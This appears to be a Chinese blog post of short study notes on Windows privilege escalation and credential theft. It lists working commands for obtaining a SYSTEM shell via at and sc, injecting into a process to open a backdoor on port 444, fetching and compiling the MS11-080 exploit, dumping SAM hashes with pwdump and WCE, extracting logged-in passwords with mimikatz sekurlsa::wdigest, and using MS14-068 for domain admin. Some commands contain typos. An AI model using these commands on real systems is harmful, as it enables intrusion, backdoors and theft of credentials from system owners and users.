zoukankan      html  css  js  c++  java

  • 提权

    at  8:00 /interactive cmd.exe    以system用户打开cmd.exe

    taskkill explorer

    taskadd explorer   以system用户打开桌面

    sc create syscmd binpath = "cmd /k start" type = own type = interact

    sc start syscmd

    net user administrator /active:yes

    tools

    https://docs.microsoft.com/zh-cn/sysinternals/

    sysinternals工具包    Windows 大神: Mark Russinovich

    psExec -i -s cmd.exe

    pInjector.exe 注入工具

    http://www.tarasco.org/security/Process_Injector

    pInjector.exe -l

    pinjector.exe -p 345 cmd.exe 444      #注入进程345,开启后门服务444 以system用户运行cmd.exe

    普通用户提权system (利用系统漏洞)

    searchsploit ms11-080

    searchspoit -m  187176.py

    pyinstaller

    pywin32

    py 转 exe

    python pyinstaller.py --onefile 18176.py

    187176.exe -O xp   

    PwdDown获取sam哈希值

    pwdDump -x 127.0.01pwdDump 127.0.0.1

    破解sam哈希在线网站

    http://www.objectif-securite.ch/ophcrack.php

    WCE从内存中获取口令工具

    另外pwddump.exe 和 wce 在kali的 /usr/share/windows/binary/  /usr/share/wce目录下有

    wce-universal.exe -h

    WCE会读取已经登录的用户密码

    俄罗斯人写的工具mimikatz_trunk 柠檬

    也可以可以获取账号密码

    ::  两个冒号查看帮助

    privilege ::   查看privilege帮助

    privilege::debug   提权到debug权限

    sekurlsa::

    sekurlsa:: wdigest  获取在线用户密码

    ms14-068  普通用户提升至域管理员用户

    dcpromo
  • 相关阅读:
    hive基本操作与应用
    用mapreduce 处理气象数据集
    熟悉常用的HBase操作,编写MapReduce作业
    爬虫大作业
    第三章 熟悉常用的HDFS操作
    数据结构化与保存
    获取全部校园新闻
    爬取校园新闻首页的新闻的详情,使用正则表达式,函数抽离
    网络爬虫基础练习
    Hadoop综合大作业
  • 原文地址:https://www.cnblogs.com/demonxian3/p/8191217.html
Copyright © 2011-2022 走看看